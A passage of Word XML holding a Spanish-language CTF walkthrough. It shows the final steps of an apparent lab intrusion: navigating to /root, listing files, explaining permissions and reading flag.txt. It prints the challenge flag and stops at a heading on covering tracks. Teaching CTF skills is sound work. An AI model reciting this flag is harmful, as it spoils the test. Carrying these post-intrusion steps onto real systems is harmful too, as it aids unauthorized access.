        <w:t xml:space="preserve"> Imprime la ruta completa del directorio en el que te encuentras actualmente.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A51A2FD" w14:textId="77777777" w:rsidR="00ED2427" w:rsidRPr="00A86A33" w:rsidRDefault="00ED2427" w:rsidP="00ED2427">
      <w:r w:rsidRPr="00A86A33">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Resultado esperado:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18E691D7" w14:textId="409BA1C1" w:rsidR="00ED2427" w:rsidRPr="00A86A33" w:rsidRDefault="00ED2427" w:rsidP="00ED2427">
      <w:r w:rsidRPr="00A86A33">
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidR="00C75B1C">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="382D94C7" w14:textId="77777777" w:rsidR="00ED2427" w:rsidRPr="00A86A33" w:rsidRDefault="00ED2427" w:rsidP="00ED2427">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A86A33">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Paso 2: Navegar al directorio de root</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A2EED62" w14:textId="711072AF" w:rsidR="00C75B1C" w:rsidRPr="00C75B1C" w:rsidRDefault="00ED2427" w:rsidP="00C75B1C">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C75B1C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">cd </w:t>
      </w:r>
      <w:r w:rsidR="00C75B1C" w:rsidRPr="00C75B1C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>root</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D61176F" w14:textId="77777777" w:rsidR="00ED2427" w:rsidRPr="00A86A33" w:rsidRDefault="00ED2427" w:rsidP="00ED2427">
      <w:r w:rsidRPr="00A86A33">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Explicación del comando:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10CCF763" w14:textId="77777777" w:rsidR="00ED2427" w:rsidRPr="00A86A33" w:rsidRDefault="00ED2427" w:rsidP="00ED2427">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A86A33">
        <w:t>cd: Change Directory - Cambiar directorio</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="223B4066" w14:textId="77777777" w:rsidR="00ED2427" w:rsidRPr="00A86A33" w:rsidRDefault="00ED2427" w:rsidP="00ED2427">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A86A33">
        <w:t>/root: El directorio personal del usuario root (como "C:\Users\Administrator" en Windows)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56223BB5" w14:textId="77777777" w:rsidR="00ED2427" w:rsidRPr="00A86A33" w:rsidRDefault="00ED2427" w:rsidP="00ED2427">
      <w:r w:rsidRPr="00A86A33">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>¿Qué hace este comando?</w:t>
      </w:r>
      <w:r w:rsidRPr="00A86A33">
        <w:t xml:space="preserve"> Cambia tu ubicación actual al directorio /root, donde típicamente se esconde la bandera en CTFs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A59607F" w14:textId="77777777" w:rsidR="00ED2427" w:rsidRPr="00A86A33" w:rsidRDefault="00ED2427" w:rsidP="00ED2427">
      <w:r w:rsidRPr="00A86A33">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>¿Por qué /root?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51D7EEDB" w14:textId="77777777" w:rsidR="00ED2427" w:rsidRPr="00A86A33" w:rsidRDefault="00ED2427" w:rsidP="00ED2427">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="58"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A86A33">
        <w:t>Es el directorio personal del superusuario</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63F3382D" w14:textId="77777777" w:rsidR="00ED2427" w:rsidRPr="00A86A33" w:rsidRDefault="00ED2427" w:rsidP="00ED2427">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="58"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A86A33">
        <w:t>Solo root puede acceder (protección máxima)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04BEF06A" w14:textId="77777777" w:rsidR="00ED2427" w:rsidRPr="00A86A33" w:rsidRDefault="00ED2427" w:rsidP="00ED2427">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="58"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A86A33">
        <w:t>Es el lugar "más seguro" del sistema</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C19D2B9" w14:textId="77777777" w:rsidR="00ED2427" w:rsidRPr="00A86A33" w:rsidRDefault="00ED2427" w:rsidP="00ED2427">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="58"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A86A33">
        <w:t>Requiere privilegios máximos para leer su contenido</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75B5D03B" w14:textId="77777777" w:rsidR="00ED2427" w:rsidRPr="00A86A33" w:rsidRDefault="00ED2427" w:rsidP="00ED2427">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A86A33">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Paso 3: Listar los archivos del directorio</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B025D25" w14:textId="77777777" w:rsidR="00ED2427" w:rsidRPr="00A86A33" w:rsidRDefault="00ED2427" w:rsidP="00ED2427">
      <w:r w:rsidRPr="00A86A33">
        <w:t>ls -la</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04BC3C12" w14:textId="77777777" w:rsidR="00ED2427" w:rsidRPr="00A86A33" w:rsidRDefault="00ED2427" w:rsidP="00ED2427">
      <w:r w:rsidRPr="00A86A33">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Explicación detallada:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44593A08" w14:textId="77777777" w:rsidR="00ED2427" w:rsidRPr="00A86A33" w:rsidRDefault="00ED2427" w:rsidP="00ED2427">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="59"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A86A33">
        <w:t>ls: List - Listar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E14274A" w14:textId="77777777" w:rsidR="00ED2427" w:rsidRPr="00A86A33" w:rsidRDefault="00ED2427" w:rsidP="00ED2427">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="59"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A86A33">
        <w:t xml:space="preserve">-l: Long format </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56340850" w14:textId="77777777" w:rsidR="00ED2427" w:rsidRPr="00A86A33" w:rsidRDefault="00ED2427" w:rsidP="00ED2427">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="59"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A86A33">
        <w:t>Muestra permisos (rwx)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="252FDB60" w14:textId="77777777" w:rsidR="00ED2427" w:rsidRPr="00A86A33" w:rsidRDefault="00ED2427" w:rsidP="00ED2427">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="59"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A86A33">
        <w:t>Propietario y grupo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37FFC472" w14:textId="77777777" w:rsidR="00ED2427" w:rsidRPr="00A86A33" w:rsidRDefault="00ED2427" w:rsidP="00ED2427">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="59"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A86A33">
        <w:t>Tamaño del archivo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A2029B2" w14:textId="77777777" w:rsidR="00ED2427" w:rsidRPr="00A86A33" w:rsidRDefault="00ED2427" w:rsidP="00ED2427">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="59"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A86A33">
        <w:t>Fecha de modificación</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EEC7B29" w14:textId="77777777" w:rsidR="00ED2427" w:rsidRPr="00A86A33" w:rsidRDefault="00ED2427" w:rsidP="00ED2427">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="59"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A86A33">
        <w:t xml:space="preserve">-a: All files </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="013DCA83" w14:textId="77777777" w:rsidR="00ED2427" w:rsidRPr="00A86A33" w:rsidRDefault="00ED2427" w:rsidP="00ED2427">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="59"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A86A33">
        <w:t>Incluye archivos ocultos (comienzan con .)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A8EA562" w14:textId="77777777" w:rsidR="00ED2427" w:rsidRPr="00A86A33" w:rsidRDefault="00ED2427" w:rsidP="00ED2427">
      <w:r w:rsidRPr="00A86A33">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>¿Qué hace este comando?</w:t>
      </w:r>
      <w:r w:rsidRPr="00A86A33">
        <w:t xml:space="preserve"> Muestra TODOS los archivos del directorio actual con información detallada.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D6B7760" w14:textId="77777777" w:rsidR="00ED2427" w:rsidRPr="00A86A33" w:rsidRDefault="00ED2427" w:rsidP="00ED2427">
      <w:r w:rsidRPr="00A86A33">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Resultado esperado:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1412645D" w14:textId="609A2E00" w:rsidR="0010195B" w:rsidRDefault="0010195B" w:rsidP="0010195B">
      <w:pPr>
        <w:ind w:left="708"/>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0010195B">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="15E3AF50" wp14:editId="647789E4">
            <wp:extent cx="2627244" cy="1212255"/>
            <wp:effectExtent l="76200" t="76200" r="135255" b="140335"/>
            <wp:docPr id="328370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70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020" cy="1222764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24ABAA" w14:textId="74BD6C11" w:rsidR="00ED2427" w:rsidRPr="00A86A33" w:rsidRDefault="00ED2427" w:rsidP="00ED2427">
      <w:r w:rsidRPr="00A86A33">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>🔍</w:t>
      </w:r>
      <w:r w:rsidRPr="00A86A33">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A86A33">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Analicemos el archivo flag.txt:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75DA615D" w14:textId="77777777" w:rsidR="00ED2427" w:rsidRPr="00A86A33" w:rsidRDefault="00ED2427" w:rsidP="00ED2427">
      <w:r w:rsidRPr="00A86A33">
        <w:t>-rw-------  1 root root   43 Oct 29 13:00 flag.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55D61280" w14:textId="77777777" w:rsidR="00ED2427" w:rsidRPr="00A86A33" w:rsidRDefault="00ED2427" w:rsidP="00ED2427">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="60"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A86A33">
        <w:t xml:space="preserve">-rw-------: Permisos </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10909557" w14:textId="77777777" w:rsidR="00ED2427" w:rsidRPr="00A86A33" w:rsidRDefault="00ED2427" w:rsidP="00ED2427">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="60"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A86A33">
        <w:t>-: Es un archivo regular (no directorio)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15BDE01B" w14:textId="77777777" w:rsidR="00ED2427" w:rsidRPr="00A86A33" w:rsidRDefault="00ED2427" w:rsidP="00ED2427">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="60"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A86A33">
        <w:t>rw-: Owner (root) puede leer y escribir</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="304B39CF" w14:textId="77777777" w:rsidR="00ED2427" w:rsidRPr="00A86A33" w:rsidRDefault="00ED2427" w:rsidP="00ED2427">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="60"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A86A33">
        <w:t>---: Group no tiene permisos</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50F59769" w14:textId="77777777" w:rsidR="00ED2427" w:rsidRPr="00A86A33" w:rsidRDefault="00ED2427" w:rsidP="00ED2427">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="60"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A86A33">
        <w:t>---: Others no tienen permisos</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78BE6F7B" w14:textId="77777777" w:rsidR="00ED2427" w:rsidRPr="00A86A33" w:rsidRDefault="00ED2427" w:rsidP="00ED2427">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="60"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A86A33">
        <w:t>1: Número de enlaces duros</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CC7C7CE" w14:textId="77777777" w:rsidR="00ED2427" w:rsidRPr="00A86A33" w:rsidRDefault="00ED2427" w:rsidP="00ED2427">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="60"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A86A33">
        <w:t>root root: Propietario y grupo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57490912" w14:textId="77777777" w:rsidR="00ED2427" w:rsidRPr="00A86A33" w:rsidRDefault="00ED2427" w:rsidP="00ED2427">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="60"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A86A33">
        <w:t>43: Tamaño en bytes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27EDCC36" w14:textId="77777777" w:rsidR="00ED2427" w:rsidRPr="00A86A33" w:rsidRDefault="00ED2427" w:rsidP="00ED2427">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="60"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A86A33">
        <w:t>Oct 29 13:00: Fecha de última modificación</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68BFF0D5" w14:textId="77777777" w:rsidR="00ED2427" w:rsidRPr="00A86A33" w:rsidRDefault="00ED2427" w:rsidP="00ED2427">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="60"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A86A33">
        <w:t>flag.txt: Nombre del archivo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26870495" w14:textId="77777777" w:rsidR="00ED2427" w:rsidRPr="00A86A33" w:rsidRDefault="00ED2427" w:rsidP="00ED2427">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A86A33">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Paso 4: Leer la bandera</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24C77C81" w14:textId="77777777" w:rsidR="00ED2427" w:rsidRPr="00A86A33" w:rsidRDefault="00ED2427" w:rsidP="00ED2427">
      <w:r w:rsidRPr="00A86A33">
        <w:t>cat flag.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1400396E" w14:textId="77777777" w:rsidR="00ED2427" w:rsidRPr="00A86A33" w:rsidRDefault="00ED2427" w:rsidP="00ED2427">
      <w:r w:rsidRPr="00A86A33">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Explicación del comando:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67A7FF42" w14:textId="77777777" w:rsidR="00ED2427" w:rsidRPr="00A86A33" w:rsidRDefault="00ED2427" w:rsidP="00ED2427">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="61"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A86A33">
        <w:t>cat: Concatenate - Concatenar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32F88010" w14:textId="77777777" w:rsidR="00ED2427" w:rsidRPr="00A86A33" w:rsidRDefault="00ED2427" w:rsidP="00ED2427">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="61"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A86A33">
        <w:t>Originalmente diseñado para concatenar archivos</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0255ADAC" w14:textId="77777777" w:rsidR="00ED2427" w:rsidRPr="00A86A33" w:rsidRDefault="00ED2427" w:rsidP="00ED2427">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="61"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A86A33">
        <w:t>Uso común: Mostrar contenido de archivos en pantalla</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BF45A61" w14:textId="77777777" w:rsidR="00ED2427" w:rsidRPr="00A86A33" w:rsidRDefault="00ED2427" w:rsidP="00ED2427">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="61"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A86A33">
        <w:t>flag.txt: El archivo que queremos leer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="583C0C3D" w14:textId="77777777" w:rsidR="00ED2427" w:rsidRPr="00A86A33" w:rsidRDefault="00ED2427" w:rsidP="00ED2427">
      <w:r w:rsidRPr="00A86A33">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>¿Qué hace este comando?</w:t>
      </w:r>
      <w:r w:rsidRPr="00A86A33">
        <w:t xml:space="preserve"> Lee el contenido del archivo flag.txt y lo muestra en la terminal.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12AE5834" w14:textId="77777777" w:rsidR="00ED2427" w:rsidRPr="00A86A33" w:rsidRDefault="00ED2427" w:rsidP="00ED2427">
      <w:r w:rsidRPr="00A86A33">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Resultado esperado:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="457A86C7" w14:textId="77777777" w:rsidR="00ED2427" w:rsidRDefault="00ED2427" w:rsidP="00ED2427">
      <w:r w:rsidRPr="00A86A33">
        <w:t>CTF{un3374l_b4ckd00r_pwn3d_20241029}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08914980" w14:textId="77777777" w:rsidR="00ED2427" w:rsidRPr="00A86A33" w:rsidRDefault="00ED2427" w:rsidP="00ED2427">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A86A33">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>🏆</w:t>
      </w:r>
      <w:r w:rsidRPr="00A86A33">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> ¡VICTORIA!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48BD78BC" w14:textId="77777777" w:rsidR="00ED2427" w:rsidRPr="00A86A33" w:rsidRDefault="00ED2427" w:rsidP="00ED2427">
      <w:r w:rsidRPr="00A86A33">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>¡FELICIDADES! Has completado el CTF exitosamente.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27CD97D8" w14:textId="3095109F" w:rsidR="00ED2427" w:rsidRPr="0010195B" w:rsidRDefault="00ED2427" w:rsidP="00ED2427">
      <w:r w:rsidRPr="0010195B">
        <w:t>Copia la bandera completa (incluyendo CTF{ y }) como evidencia de tu éxito.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15470141" w14:textId="77777777" w:rsidR="00ED2427" w:rsidRPr="00A86A33" w:rsidRDefault="00ED2427" w:rsidP="00ED2427">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A86A33">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Comandos adicionales útiles (Opcional):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6007CE89" w14:textId="77777777" w:rsidR="00ED2427" w:rsidRPr="0010195B" w:rsidRDefault="00ED2427" w:rsidP="00ED2427">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0010195B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Ver el contenido con números de línea:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="268B5941" w14:textId="77777777" w:rsidR="00ED2427" w:rsidRPr="00A86A33" w:rsidRDefault="00ED2427" w:rsidP="00ED2427">
      <w:r w:rsidRPr="00A86A33">
        <w:t>cat -n flag.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AEBD347" w14:textId="77777777" w:rsidR="00ED2427" w:rsidRPr="00A86A33" w:rsidRDefault="00ED2427" w:rsidP="00ED2427">
      <w:r w:rsidRPr="00A86A33">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Ver el contenido con caracteres especiales visibles:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54151B44" w14:textId="77777777" w:rsidR="00ED2427" w:rsidRPr="00A86A33" w:rsidRDefault="00ED2427" w:rsidP="00ED2427">
      <w:r w:rsidRPr="00A86A33">
        <w:lastRenderedPageBreak/>
        <w:t>cat -A flag.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48C3DCB0" w14:textId="77777777" w:rsidR="00ED2427" w:rsidRPr="00A86A33" w:rsidRDefault="00ED2427" w:rsidP="00ED2427">
      <w:r w:rsidRPr="00A86A33">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Copiar la bandera al portapapeles (si estás en terminal gráfica):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CF635BD" w14:textId="77777777" w:rsidR="00ED2427" w:rsidRPr="00A86A33" w:rsidRDefault="00ED2427" w:rsidP="00ED2427">
      <w:r w:rsidRPr="00A86A33">
        <w:t>cat flag.txt | xclip -selection clipboard</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C78596B" w14:textId="77777777" w:rsidR="00ED2427" w:rsidRPr="00A86A33" w:rsidRDefault="00ED2427" w:rsidP="00ED2427">
      <w:r w:rsidRPr="00A86A33">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Ver los permisos exactos en octal:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="200B3BD5" w14:textId="77777777" w:rsidR="00ED2427" w:rsidRPr="00A86A33" w:rsidRDefault="00ED2427" w:rsidP="00ED2427">
      <w:r w:rsidRPr="00A86A33">
        <w:t>stat flag.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A032BAD" w14:textId="77777777" w:rsidR="00ED2427" w:rsidRPr="00A86A33" w:rsidRDefault="00433E8C" w:rsidP="00ED2427">
      <w:r w:rsidRPr="00A86A33">
        <w:pict w14:anchorId="25ED99D6">
          <v:rect id="_x0000_i1036" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="16AF68C3" w14:textId="77777777" w:rsidR="00ED2427" w:rsidRPr="00A86A33" w:rsidRDefault="00ED2427" w:rsidP="00ED2427">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A86A33">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>FASE 7: REPORTE Y LIMPIEZA (REPORTING &amp; COVERING TRACKS)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6252BD4E" w14:textId="77777777" w:rsidR="00ED2427" w:rsidRPr="00A86A33" w:rsidRDefault="00ED2427" w:rsidP="00ED2427">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A86A33">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>¿Qué es esta fase?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B354995" w14:textId="77777777" w:rsidR="00ED2427" w:rsidRPr="00A86A33" w:rsidRDefault="00ED2427" w:rsidP="00ED2427">
      <w:r w:rsidRPr="00A86A33">
        <w:t>En un pentesting profesional, esta es una de las fases MÁS IMPORTANTES, donde:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66549059" w14:textId="77777777" w:rsidR="00ED2427" w:rsidRPr="00A86A33" w:rsidRDefault="00ED2427" w:rsidP="00ED2427">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="62"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A86A33">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Documentas todo lo que hiciste</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5532A183" w14:textId="77777777" w:rsidR="00ED2427" w:rsidRPr="00A86A33" w:rsidRDefault="00ED2427" w:rsidP="00ED2427">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="62"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A86A33">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Escribes un informe técnico y ejecutivo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="126B101C" w14:textId="77777777" w:rsidR="00ED2427" w:rsidRPr="00A86A33" w:rsidRDefault="00ED2427" w:rsidP="00ED2427">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="62"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A86A33">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Proporcionas recomendaciones de remediación</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3055BCC4" w14:textId="77777777" w:rsidR="00ED2427" w:rsidRPr="00A86A33" w:rsidRDefault="00ED2427" w:rsidP="00ED2427">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="62"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A86A33">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
